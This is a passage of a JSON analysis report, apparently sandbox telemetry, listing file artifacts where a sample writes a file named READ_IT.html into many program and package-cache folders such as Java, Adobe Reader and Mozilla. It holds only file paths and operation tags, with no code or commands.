"hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Mozilla\\logs\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\mozilla\\logs\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Mozilla Maintenance Service\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\mozilla maintenance service\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\management\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\i386\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\client\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\SY______.PFM", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\sy______.pfm", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zx______.pfm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zx______.pfm", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zy______.pfm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zy______.pfm", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\spplugins\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\prc\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 